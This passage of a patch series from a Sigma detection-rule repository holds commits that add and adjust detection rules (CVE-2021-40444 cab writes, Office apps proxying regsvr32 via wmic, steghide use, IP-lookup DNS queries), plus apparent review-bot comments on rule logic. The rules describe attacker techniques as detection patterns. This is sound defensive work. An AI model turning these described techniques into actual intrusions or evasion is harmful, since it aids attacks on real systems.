wow_current_version or + wow_nt_current_version_base and wow_nt_current_version or + (wow_office or office) and wow_office_details or + (wow_ie or ie) and wow_ie_details or + wow_classes_base and wow_classes or + classes_base and classes or + scripts_base and scripts or + winsock_parameters_base and winsock_parameters or + system_control_base and system_control fields: - SecurityID - ObjectName diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 25eca696..36a76bc4 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml 
+++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -40,7 +40,7 @@ detection: - 'process' - 'create' - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 + condition: selection1 and selection2 and selection3 and selection4 falsepositives: - Unknown level: high diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 1c4366eb..91d31498 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -35,7 +35,7 @@ detection: - ".bat" - ".scr" - ".proj" - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 9a2cecf1..a8e8f582 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -28,7 +28,7 @@ detection: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high From 5aa5586c546696c8f374cbe72933273bf1681831 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 10 Sep 2021 09:43:11 -0500 Subject: [PATCH 0862/1367] Update Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml --- ..._creation_by_Office_applications_using_file_extentions.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 28f02620..f7ae0196 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,6 +1,6 @@ title: File Creation by Office Applications id: 8c6fd6fc-28fc-4597-a86a-fc1de20b039d -description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -17,7 +17,7 @@ logsource: product: Windows category: file_event detection: - #useful_information: Please add more file extentions and magic bytes to the logic of your choice. + #useful_information: Please add more file extensions and magic bytes to the logic of your choice. selection1: Image|endswith: - 'winword.exe' From 9d9a5088bbe6652ee049d348738db59f47663673 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 10 Sep 2021 09:43:24 -0500 Subject: [PATCH 0863/1367] Update Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml --- ..._creation_by_Office_applications_using_file_extentions.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 1c4366eb..3124e669 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,6 +1,6 @@ title: Created Files by Office Applications id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 -description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -17,7 +17,7 @@ logsource: product: Windows category: file_event detection: - #useful_information: Please add more file extentions to the logic of your choice. + #useful_information: Please add more file extensions to the logic of your choice. selection1: Image|endswith: - 'winword.exe' From 57d349bfe58d4a27594d087811ad97dcee376084 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 10 Sep 2021 09:44:22 -0500 Subject: [PATCH 0864/1367] Update process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml --- ...e_application_from_proxy_executing_regsvr32_with_payload.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml index eabcf9c8..86193467 100644 --- a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml @@ -1,6 +1,6 @@ title: Excel Proxy Executing Regsvr32 With Payload id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 -description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml From 1ea9aab45535bdae73d847e161c39f9c72585fdc Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Fri, 10 Sep 2021 09:44:31 -0500 Subject: [PATCH 0865/1367] Update Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml --- ..._Applications_from_proxy_executing_regsvr32_with_payload.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 25eca696..be10997e 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -1,6 +1,6 @@ title: Excel Proxy Executing Regsvr32 With Payload id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 -description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml From a798469961036200c21d22e88bb8195eef152fce Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Fri, 10 Sep 2021 09:46:57 -0500 Subject: [PATCH 0866/1367] Update lacework.py --- tools/sigma/backends/lacework.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index d28c3053..41433534 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -166,7 +166,7 @@ class LaceworkBackend(SingleTextQueryBackend): If value is a field name 1. Do not wrap in valueExpression - 2. Transfrom using fieldNameMapping() + 2. Transform using fieldNameMapping() """ node = self.cleanValue(str(node)) @@ -405,7 +405,7 @@ class LaceworkQuery: @staticmethod def should_generate_query(backend_options): - # if we are explictly requesting a query + # if we are explicitly requesting a query if ( 'query' in backend_options and backend_options['query'] is True @@ -588,7 +588,7 @@ class LaceworkPolicy: @staticmethod def should_generate_policy(backend_options): - # if we are explictly requesting a query + # if we are explicitly requesting a query if ( 'policy' in backend_options and backend_options['policy'] is True From 9e7ede66cc15c8629211ee9570ed22b084779242 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 10 Sep 2021 18:13:09 +0200 Subject: [PATCH 0867/1367] CVE-2021-40444 file creation - winword.exe + .cab --- .../win_file_winword_cve_2021_40444.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/file_event/win_file_winword_cve_2021_40444.yml diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml new file mode 100644 index 00000000..4eacdf8a --- /dev/null +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml 
@@ -0,0 +1,23 @@ +title: Suspicious Word Cab File Write CVE-2021-40444 +id: 60c0a111-787a-4e8a-9262-ee485f3ef9d5 +status: experimental +description: Detects file creation patterns noticable during the exploitation of CVE-2021-40444 +references: + - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20 +author: Florian Roth +date: 2021/09/10 +logsource: + product: windows + category: file_event +detection: + selection: + Image: '\winword.exe' + TargetFilename|endswith: '.cab' + TargetFilename|contains: '\Windows\INetCache' + condition: selection +fields: + - TargetFilename +falsepositives: + - unknown +level: critical + From a4e2c0feba5e593d53f706b99d302a60cf2bc9de Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 10 Sep 2021 18:13:36 +0200 Subject: [PATCH 0868/1367] Revert "refactor: exclude case in which upper ticks are used" This reverts commit f00aaf8461f97abec19f81aa4fc0edaa76ff6cf1. --- .../process_creation/win_susp_control_cve_2021_40444.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 2a02b7ad..312b047b 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -20,9 +20,7 @@ detection: - '\powerpnt.exe' - '\excel.exe' filter: - CommandLine|endswith: - - '\control.exe input.dll' - - '\control.exe" input.dll' + CommandLine|endswith: '\control.exe input.dll' condition: selection and not filter falsepositives: - Unknown From 033494c8f7e58d1278e7764978a03c06e2a19992 Mon Sep 17 00:00:00 2001 
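Review bot: `Image: '\winword.exe'` in the new selection is an exact match, so a full image path never equals that string and the rule cannot fire; the other rules on this page match the binary name with the suffix modifier, so it should read `Image|endswith: '\winword.exe'`. The description has a typo (`noticable` → `noticeable`), and the file ends with an extra blank `+` line the other rules do not carry. `TargetFilename|contains: '\Windows\INetCache'` pins the detection to the cab being written under the browser cache path as the referenced report describes; a one-line comment saying so (`# cab dropped into the IE cache per the reference`) would help whoever later tunes the rule.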
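Review bot: Reverting the filter to the single string `'\control.exe input.dll'` means a command line that quotes the control.exe path (the second pattern the reverted commit had excluded) is matched again, and neither the commit message nor the rule says why. If that is intended, a comment on the filter (`# quoted control.exe path deliberately not excluded`) and a `modified:` date would stop the next contributor re-adding the pattern. `condition: selection and not filter` is unchanged; the rule's header fields are outside this hunk.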
From: "neonprimetime security (Justin C Miller)" Date: Fri, 10 Sep 2021 12:14:43 -0500 Subject: [PATCH 0869/1367] Propose making rule more generic than just ipify Propose making this detection more generic, cover more lookup services than just ipify https://twitter.com/neonprimetime/status/1436376497980428318 --- rules/network/net_susp_ipify.yml | 30 +++++++++++++++++++++++++----- 1 file changed, 25 insertions(+), 5 deletions(-) diff --git a/rules/network/net_susp_ipify.yml b/rules/network/net_susp_ipify.yml index 2149c090..cbca433a 100644 --- a/rules/network/net_susp_ipify.yml +++ b/rules/network/net_susp_ipify.yml 
@@ -1,26 +1,46 @@ -title: Suspicious DNS Query for IPify API +title: Suspicious DNS Query for IP Lookup Service APIs id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 -description: Detects DNS queries for api.ipify.org not originating from a browser process. +description: Detects DNS queries for ip lookup services such as api.ipify.org not originating from a browser process. status: experimental date: 2021/07/08 author: Brandon George (blog post), Thomas Patzke (rule) references: - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon + - https://twitter.com/neonprimetime/status/1436376497980428318 tags: - attack.reconnaissance - attack.t1590 falsepositives: - - Legitimate usage of ipify API + - Legitimate usage of ip lookup services such as ipify API level: medium logsource: product: windows category: dns_query detection: dns_request: - QueryName: api.ipify.org + QueryName: + - canireachthe.net + - ipv4.icanhazip.com + - ip.anysrc.net + - edns.ip-api.com + - wtfismyip.com + - checkip.dyndns.org + - api.2ip.ua + - icanhazip.com + - api.ipify.org + - ip-api.com + - checkip.amazonaws.com + - ipecho.net + - ipinfo.io + - ipv4bot.whatismyipaddress.com + - freegeoip.app browser_process: Image|endswith: - \chrome.exe - \iexplore.exe - \firefox.exe - condition: dns_request and not browser_process \ No newline at end of file + - \brave.exe + - \opera.exe + - \msedge.exe + - \vivaldi.exe + condition: dns_request and not browser_process From 1dec1a49fa6c6aa280c760fbe02b804548e94008 Mon Sep 17 00:00:00 2001 From: albchen Date: Fri, 10 Sep 2021 15:51:32 -0700 Subject: [PATCH 0870/1367] Mapped OriginalFileName in DeviceProcessEvents Mapped OriginalFileName to ProcessVersionInfoOriginalFileName in DeviceProcessEvents. Tested and works for rules such as https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_renamed_binary.yml --- tools/sigma/backends/mdatp.py | 1 + 1 file changed, 1 insertion(+) 
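Review bot: `QueryName:` with a plain list is an exact match per entry, so sibling hostnames of the listed services (for ipify the documented `api4`/`api6`/`api64` hosts, for icanhazip the `ipv6.` host) still pass although the title now promises generic IP-lookup coverage; either add those names or switch the apex entries to `QueryName|endswith:` (`- .ipify.org`, `- .icanhazip.com`, `- .ip-api.com`) and keep the exact list for hosts such as `checkip.amazonaws.com` where the apex domain is far too broad. The list already mixes apex domains with hostnames (`ip-api.com` next to `edns.ip-api.com`, `icanhazip.com` next to `ipv4.icanhazip.com`), which suggests suffix matching was the intent. The file name `net_susp_ipify.yml` no longer matches the widened title.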
diff --git a/tools/sigma/backends/mdatp.py b/tools/sigma/backends/mdatp.py index 1d45b747..0becb7a6 100644 --- a/tools/sigma/backends/mdatp.py +++ b/tools/sigma/backends/mdatp.py @@ -83,6 +83,7 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "ImageLoaded": ("FolderPath", self.default_value_mapping), "LogonType": (self.id_mapping, self.logontype_mapping), "NewProcessName": ("FolderPath", self.default_value_mapping), + "OriginalFileName": ("ProcessVersionInfoOriginalFileName", self.default_value_mapping), "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ParentName": ("InitiatingProcessFileName", self.default_value_mapping), "ParentProcessName": ("InitiatingProcessFileName", self.default_value_mapping), From 8d3a77d1f5a8a1fb8f5d137321d457a5f3275ad4 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 11 Sep 2021 08:31:24 +0200 Subject: [PATCH 0871/1367] Update net_susp_ipify.yml --- rules/network/net_susp_ipify.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/network/net_susp_ipify.yml b/rules/network/net_susp_ipify.yml index cbca433a..cf893946 100644 --- a/rules/network/net_susp_ipify.yml +++ b/rules/network/net_susp_ipify.yml @@ -3,6 +3,7 @@ id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 description: Detects DNS queries for ip lookup services such as api.ipify.org not originating from a browser process. status: experimental date: 2021/07/08 +modified: 2021/09/10 author: Brandon George (blog post), Thomas Patzke (rule) references: - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon From 89f15c01f9a4b9827af0602505e8675e9179418d Mon Sep 17 00:00:00 2001 
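Review bot: The new `"OriginalFileName": ("ProcessVersionInfoOriginalFileName", self.default_value_mapping)` entry sits in a mapping that, as far as this hunk shows, is not keyed by event table, while the commit message only claims it was tested against DeviceProcessEvents; if the same dict serves the other tables this backend emits, confirm the target column exists there too, or the generated query will reference an unknown column. A short comment on the line, `# DeviceProcessEvents column; verify for other tables`, would record that scope. The enclosing method starts outside the hunk.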
From: Pawel Mazur Date: Sat, 11 Sep 2021 10:56:17 +0200 Subject: [PATCH 0872/1367] New Linux Auditd Rules - Steghide Steganography --- ...nx_auditd_steghide_embed_steganography.yml | 33 +++++++++++++++++++ ..._auditd_steghide_extract_steganography.yml | 31 +++++++++++++++++ 2 files changed, 64 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml create mode 100644 rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml diff --git a/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml b/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml new file mode 100644 index 00000000..36a83f67 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml @@ -0,0 +1,33 @@ +title: Steganography Hide Files with Steghide +id: ce446a9e-30b9-4483-8e38-d2c9ad0a2280 +description: Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/11 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - None +level: low +logsource: + product: linux + service: auditd +detection: + type: + type: EXECVE + commands: + a0: steghide + a1: embed + a2: + a2: + - '-cf' + - '-ef' + a4: + a4: + - '-cf' + - '-ef' + condition: type and commands and a2 and a4 diff --git a/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml b/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml new file mode 100644 index 00000000..22c6dd1f --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml 
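Review bot: The new embed rule keys its detection on argument positions (`a2` and `a4` each matching `-cf`/`-ef`), but steghide does not require a fixed option order, so an invocation that gives the passphrase option first or between the two file options shifts `-cf`/`-ef` to other slots and is missed; the extract rule in the following hunk makes the same positional assumption (`a2: '-sf'`, `a3|endswith`). Matching on `a0: steghide` with `a1: embed`/`extract` alone, or listing the option across several argument slots, is more robust, and a comment such as `# assumes: steghide embed -cf <cover> -ef <file>` at least documents the assumption. `embeding` in the description should be `embedding`. `falsepositives: - None` reads as a literal; the other rules on this page use `Unknown` or a concrete case.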
@@ -0,0 +1,31 @@ +title: Steganography Extract Files with Steghide +id: a5a827d9-1bbe-4952-9293-c59d897eb41b +description: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/11 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - None +level: low +logsource: + product: linux + service: auditd +detection: + type: + type: EXECVE + commands: + a0: steghide + a1: extract + a2: + a2: '-sf' + a3: + a3|endswith: + - '.jpg' + - '.png' + condition: type and commands and a2 and a3 From d0741f9f3a80fa6c0627b3834c4b8ccde50a1485 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Sat, 11 Sep 2021 11:18:08 +0200 Subject: [PATCH 0873/1367] Update lnx_auditd_steghide_embed_steganography.yml Formatting and detection changes --- .../auditd/lnx_auditd_steghide_embed_steganography.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml b/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml index 36a83f67..584003dc 100644 --- a/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml @@ -17,17 +17,14 @@ logsource: product: linux service: auditd detection: - type: + Steghide: type: EXECVE - commands: a0: steghide a1: embed - a2: a2: - '-cf' - '-ef' - a4: a4: - '-cf' - '-ef' - condition: type and commands and a2 and a4 + condition: Steghide From 6412ddaaee6f4b175f65037c82558473dc83d0d6 Mon Sep 17 00:00:00 2001 
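Review bot: `a3|endswith` in the extract rule accepts only `.jpg` and `.png`, but steghide's supported stego formats are, as far as I recall its manual, JPEG, BMP, WAV and AU — PNG is not among them, while `.jpeg`, `.bmp`, `.wav` and `.au` stego files are missed. Suggested list: `a3|endswith: ['.jpg', '.jpeg', '.bmp', '.wav', '.au']`. Whether upper-case extensions match depends on the backend's case handling for `endswith`, so either add the upper-case variants or note the assumption in the description. The positional `a2: '-sf'` also misses `--stegofile` and any order that passes `-p` before `-sf`.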
From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Sat, 11 Sep 2021 11:19:21 +0200 Subject: [PATCH 0874/1367] Update lnx_auditd_steghide_extract_steganography.yml --- .../auditd/lnx_auditd_steghide_extract_steganography.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml b/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml index 22c6dd1f..87fe4c42 100644 --- a/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml @@ -17,15 +17,12 @@ logsource: product: linux service: auditd detection: - type: + Steghide: type: EXECVE - commands: a0: steghide a1: extract - a2: a2: '-sf' - a3: a3|endswith: - '.jpg' - '.png' - condition: type and commands and a2 and a3 + condition: Steghide From 2a76c469e0b4ec8a2b8cd90a75cb5cd75ede5eaa Mon Sep 17 00:00:00 2001 
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 11 Sep 2021 13:34:19 +0200 Subject: [PATCH 0875/1367] normalise name --- ...ervicebus.yml => dns_query_hybridconnectionmgr_servicebus.yml} | 0 .../windows/dns_query/{dns_mega_nz.yml => dns_query_mega_nz.yml} | 0 ...ble_dns_rebinding.yml => dns_query_possible_dns_rebinding.yml} | 0 ...{sysmon_susp_driver_load.yml => driver_load_susp_temp_use.yml} | 0 ...vuln_dell_driver_load.yml => driver_load_vuln_dell_driver.yml} | 0 ...sysmon_windivert_driver_load.yml => driver_load_windivert.yml} | 0 ...mal_octopus_scanner.yml => file_event_mal_octopus_scanner.yml} | 0 ..._mockingbird.yml => process_creation_mal_blue_mockingbird.yml} | 0 ..._darkside.yml => process_creation_mal_darkside_ransomware.yml} | 0 ...kergoga.yml => process_creation_mal_lockergoga_ransomware.yml} | 0 .../malware/{win_mal_ryuk.yml => process_creation_mal_ryuk.yml} | 0 .../{mal_azorult_reg.yml => registry_event_mal_azorult.yml} | 0 .../{win_mal_flowcloud.yml => registry_event_mal_flowcloud.yml} | 0 .../malware/{win_mal_ursnif.yml => registry_event_mal_ursnif.yml} | 0 14 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/dns_query/{dns_query_dns_hybridconnectionmgr_servicebus.yml => dns_query_hybridconnectionmgr_servicebus.yml} (100%) rename rules/windows/dns_query/{dns_mega_nz.yml => dns_query_mega_nz.yml} (100%) rename rules/windows/dns_query/{sysmon_possible_dns_rebinding.yml => dns_query_possible_dns_rebinding.yml} (100%) rename rules/windows/driver_load/{sysmon_susp_driver_load.yml => driver_load_susp_temp_use.yml} (100%) rename rules/windows/driver_load/{sysmon_vuln_dell_driver_load.yml => driver_load_vuln_dell_driver.yml} (100%) rename rules/windows/driver_load/{sysmon_windivert_driver_load.yml => driver_load_windivert.yml} (100%) rename rules/windows/malware/{win_mal_octopus_scanner.yml => file_event_mal_octopus_scanner.yml} (100%) rename rules/windows/malware/{win_mal_blue_mockingbird.yml => 
process_creation_mal_blue_mockingbird.yml} (100%) rename rules/windows/malware/{win_mal_darkside.yml => process_creation_mal_darkside_ransomware.yml} (100%) rename rules/windows/malware/{win_mal_lockergoga.yml => process_creation_mal_lockergoga_ransomware.yml} (100%) rename rules/windows/malware/{win_mal_ryuk.yml => process_creation_mal_ryuk.yml} (100%) rename rules/windows/malware/{mal_azorult_reg.yml => registry_event_mal_azorult.yml} (100%) rename rules/windows/malware/{win_mal_flowcloud.yml => registry_event_mal_flowcloud.yml} (100%) rename rules/windows/malware/{win_mal_ursnif.yml => registry_event_mal_ursnif.yml} (100%) diff --git a/rules/windows/dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml b/rules/windows/dns_query/dns_query_hybridconnectionmgr_servicebus.yml similarity index 100% rename from rules/windows/dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml rename to rules/windows/dns_query/dns_query_hybridconnectionmgr_servicebus.yml diff --git a/rules/windows/dns_query/dns_mega_nz.yml b/rules/windows/dns_query/dns_query_mega_nz.yml similarity index 100% rename from rules/windows/dns_query/dns_mega_nz.yml rename to rules/windows/dns_query/dns_query_mega_nz.yml diff --git a/rules/windows/dns_query/sysmon_possible_dns_rebinding.yml b/rules/windows/dns_query/dns_query_possible_dns_rebinding.yml similarity index 100% rename from rules/windows/dns_query/sysmon_possible_dns_rebinding.yml rename to rules/windows/dns_query/dns_query_possible_dns_rebinding.yml diff --git a/rules/windows/driver_load/sysmon_susp_driver_load.yml b/rules/windows/driver_load/driver_load_susp_temp_use.yml similarity index 100% rename from rules/windows/driver_load/sysmon_susp_driver_load.yml rename to rules/windows/driver_load/driver_load_susp_temp_use.yml 
diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml b/rules/windows/driver_load/driver_load_vuln_dell_driver.yml similarity index 100% rename from rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml rename to rules/windows/driver_load/driver_load_vuln_dell_driver.yml diff --git a/rules/windows/driver_load/sysmon_windivert_driver_load.yml b/rules/windows/driver_load/driver_load_windivert.yml similarity index 100% rename from rules/windows/driver_load/sysmon_windivert_driver_load.yml rename to rules/windows/driver_load/driver_load_windivert.yml diff --git a/rules/windows/malware/win_mal_octopus_scanner.yml b/rules/windows/malware/file_event_mal_octopus_scanner.yml similarity index 100% rename from rules/windows/malware/win_mal_octopus_scanner.yml rename to rules/windows/malware/file_event_mal_octopus_scanner.yml diff --git a/rules/windows/malware/win_mal_blue_mockingbird.yml b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml similarity index 100% rename from rules/windows/malware/win_mal_blue_mockingbird.yml rename to rules/windows/malware/process_creation_mal_blue_mockingbird.yml diff --git a/rules/windows/malware/win_mal_darkside.yml b/rules/windows/malware/process_creation_mal_darkside_ransomware.yml similarity index 100% rename from rules/windows/malware/win_mal_darkside.yml rename to rules/windows/malware/process_creation_mal_darkside_ransomware.yml diff --git a/rules/windows/malware/win_mal_lockergoga.yml b/rules/windows/malware/process_creation_mal_lockergoga_ransomware.yml similarity index 100% rename from rules/windows/malware/win_mal_lockergoga.yml rename to rules/windows/malware/process_creation_mal_lockergoga_ransomware.yml diff --git a/rules/windows/malware/win_mal_ryuk.yml b/rules/windows/malware/process_creation_mal_ryuk.yml similarity index 100% rename from rules/windows/malware/win_mal_ryuk.yml rename to rules/windows/malware/process_creation_mal_ryuk.yml 
diff --git a/rules/windows/malware/mal_azorult_reg.yml b/rules/windows/malware/registry_event_mal_azorult.yml similarity index 100% rename from rules/windows/malware/mal_azorult_reg.yml rename to rules/windows/malware/registry_event_mal_azorult.yml diff --git a/rules/windows/malware/win_mal_flowcloud.yml b/rules/windows/malware/registry_event_mal_flowcloud.yml similarity index 100% rename from rules/windows/malware/win_mal_flowcloud.yml rename to rules/windows/malware/registry_event_mal_flowcloud.yml diff --git a/rules/windows/malware/win_mal_ursnif.yml b/rules/windows/malware/registry_event_mal_ursnif.yml similarity index 100% rename from rules/windows/malware/win_mal_ursnif.yml rename to rules/windows/malware/registry_event_mal_ursnif.yml From 338c9f5ae750801cb0c83f7ff948f135f58fb1a2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 11 Sep 2021 13:45:41 +0200 Subject: [PATCH 0876/1367] Split global rule --- .../process_creation_mal_blue_mockingbird.yml | 50 +++++++------------ .../registry_event_mal_blue_mockingbird.yml | 26 ++++++++++ 2 files changed, 44 insertions(+), 32 deletions(-) create mode 100644 